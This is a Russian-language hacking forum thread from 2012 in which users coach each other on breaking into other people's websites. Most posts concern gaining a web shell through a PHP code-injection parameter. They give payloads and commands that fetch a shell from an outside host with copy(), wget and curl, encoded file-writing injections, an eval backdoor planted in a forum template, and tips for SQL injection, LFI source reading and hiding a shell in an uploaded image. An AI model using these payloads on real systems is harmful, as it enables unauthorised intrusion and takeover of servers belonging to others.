Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Ну так все выведи через лимит. Потом найди таблицы типа permissons и т.д.
     
    1 person likes this.
  2. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Есть выполнение php скрипта на сайте, как залить шелл?
    http://www.site.com/index.php?s=10&id=phpinfo();
    mq=on
     
    #19162 er9j6@, 31 Jan 2012
    Last edited: 31 Jan 2012
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    914
    Reputations:
    363
    base64_decode([]);
    где [] — copy('http://site1.tu/shell.txt', './shell.php'); в base64
     
    _________________________
    1 person likes this.
  4. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    так в этом и вся проблема, таблицы типа user_rights, user_permisson, admin_user и т.п. нет.
    а ты говорил что пасс может быть в файле, это как то можно проверить?? (всмисле через запрос к мускулу)
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    пасс в файле, такое встречается на околоафриканских сайтах, или в ретро web -е, если нету таблиц значит они в другой базе, если нету таблиц для админа значит авторизация через пароли которые хранятся внутри скрипта, включите фантазию
     
    _________________________
  6. good.god

    good.god Member

    Joined:
    23 Nov 2009
    Messages:
    260
    Likes Received:
    32
    Reputations:
    0
    Надоело уже плодить темы с моими вопросами по залитию шелла, так что если я тут задам свой небольшой вопрос, надеюсь никто не будет возражать?
    Могу менять имя и расширение загружаемого файла через пост запрос, но, шелл в формате jpg не грузит, так как при загрузке меняются размеры изображения и выкидывается ошибка, если в картинку в конец прописать мини-шелл и загрузить (естественно переименовать расширение в пхп), то он не работает, и вижу я только код картинки.
    Кто что посоветует сделать?
     
  7. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    базы тоже проверял, только две - information_schema и текущяя

    где про это можно поподробнее прочитать??
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    о чем прочитать? нечего там прочитать, если этот тот случий тогда вам нужен file_priv или другие средства (читалка чтоли) чтоб смотреть исходники файлов, стянуть пароль
     
    _________________________
    1 person likes this.
  9. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    command denied to user - file_priv нету
    (читалка это я так понимаю из розряда LFI??)
     
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    или LFI с возможностю читать исходники с помощю php://filter, или читалка, file_get_contents, fopen, прочее
     
    _________________________
  11. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Пытаюсь создать файл со следующим содержимым
    file_put_contents('lala.php', '<? echo 50/2; ?>');

    http://www.site.com/index.php?s=10&id=base64_decode(ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=);
    mq=on
    и поэтому адресу должен появиться файл
    http://www.site.com/lala.php
    но вместо этого:
    404.
    Запрошенный Вами документ отсутствует на сервере.
     
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886

    ты функцию base64_decode передаешь стринг, почему не вижу кавычки? если mq on, тогда

    base64_decode($_GET[a]);&a=твой_base64_код
     
    _________________________
    #19172 Konqi, 31 Jan 2012
    Last edited: 31 Jan 2012
  13. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Делаю
    http://www.site.com/index.php?s=10&id=bas64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=
    и тут
    http://www.site.com/lala.php
    все равно выводит
    404.
    Запрошенный Вами документ отсутствует на сервере.
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    если твой бекдор принимает пост запросы, папробуй отправить данные POST-ом, по всей видимости там фильтр, или используй другие функции
     
    _________________________
  15. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Konqi

    какие другие функции можно еще использовать?
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886

    можешь использовать системные комманды (если safe мод off), system,exec,shell_exec,passthru, залей через wget или curl, или что там еще есть

    пример

    system($_GET[a]);&a=wget http://site.ru/shell.php

    или через принт, print(`curl http://site.ru/shell.php > ./shell.php`);

    неоднакратно обсуждалось это тема
     
    _________________________
  17. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    у меня в шаблоне записан eval, его что нужно заменить sistem?

    <if="$this->ipsclass->input['cid'] = 1">
    <if="eval($this->ipsclass->input['id'])"></if>
    </if>
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    не надо ничем заменить, вместо file_put_contents, используйте те функции которые я написал

    er9j6@ достаточно зафлудили в теме, листайте топик, уверен найдете все ответы на ваши вопросы
     
    _________________________
    1 person likes this.
  19. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    er9j6@,
    у тебя хостинг от мастерхост, смотрел phpinfo, там отключены системные функции.
     
  20. Tr[1]x

    Tr[1]x New Member

    Joined:
    20 Aug 2010
    Messages:
    30
    Likes Received:
    1
    Reputations:
    0
    Существуют ли аналоги Goolag Scanner?

    И еще вопрос: есть ли на сайте топик в котором указаны методы загрузки шеллов на сайт с примерами? желательно без помощи админ панели.
     
Thread Status:
Not open for further replies.